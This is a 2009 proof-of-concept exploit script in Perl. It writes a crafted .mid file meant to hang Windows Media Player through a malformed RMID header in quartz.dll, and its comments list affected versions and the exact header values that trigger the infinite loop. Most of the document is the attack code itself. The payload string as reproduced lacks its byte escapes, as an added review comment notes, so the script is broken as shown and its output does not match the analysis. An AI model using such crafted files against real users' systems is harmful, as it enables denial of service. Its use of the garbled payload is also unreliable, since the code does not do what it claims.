# Title : Microsoft Media Player (quartz.dll .mid) Denial of Service Exploit
# Published : 2009-04-17
# Author : Code Audit Labs
#! /usr/bin/perl
# CAL_quartz_mid_poc.pl
#
# Microsoft_Media_player_quartz.dll_mid_remote_Dos POC
# by Code Audit Labs public 2009-04-17
# http://www.vulnhunt.com/
#
#Affected
#========
#test on full updated winxp sp3
#windows media Player 10.00.00.3998 quartz.dll 6.5.3790.4283
#Windows Media Player 11.0.5721.5230 quartz.dll 6.5.2600.5596
#other versions are probably affected as well
# CVE: please assign a CVE id to this
#
#ANALYSIS
#========
# one vulnerability exists within the quartz.dll code that processes the RMID header
#the structure is as follows
#{
# char riff_id[4]; //'RIFF'
# DWORD rmid_size;
# char rmid_id[4]; //'RMID'
# char data_id[4]; //not equal to 'data'
# DWORD midi_size;
#}
#if data_id is not 'data' and midi_size is 0xfffffff8,
#the code falls into an infinite loop.
#
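# Write the crafted RIFF/RMID sample described in the ANALYSIS header to
# poc.mid in the current directory. Dies with $! if the file cannot be
# created, written, or flushed to disk.
use strict;
use warnings;

# Three-arg open with a lexical handle: the mode is fixed by the code rather
# than by the filename, and the handle cannot collide with a package global.
open(my $out, '>', 'poc.mid') or die "can't create crash sample.$!";
binmode($out);    # raw bytes, no newline translation on Windows

# NOTE(review): as reproduced on this page the literal contains no "\x"
# escapes, so it holds plain ASCII characters rather than the byte layout
# given in the ANALYSIS header above -- confirm against the original listing.
my $data =
    "x52x49x46x46xffxffx00x00x52x4dx49x44x64x64x64x64" .
    "xf8xffxffxffx4dx54x68x64xffxffxffxffxf8xffxffxf8" .
    "xf8xffxffxffxf7xffxffxffxffxffxffxffxffxffxffxff" .
    "xffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxff" .
    "xffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxff";

print {$out} $data or die "can't write crash sample.$!";
# Buffered write errors only surface at close, so check its result as well.
close($out) or die "can't close crash sample.$!";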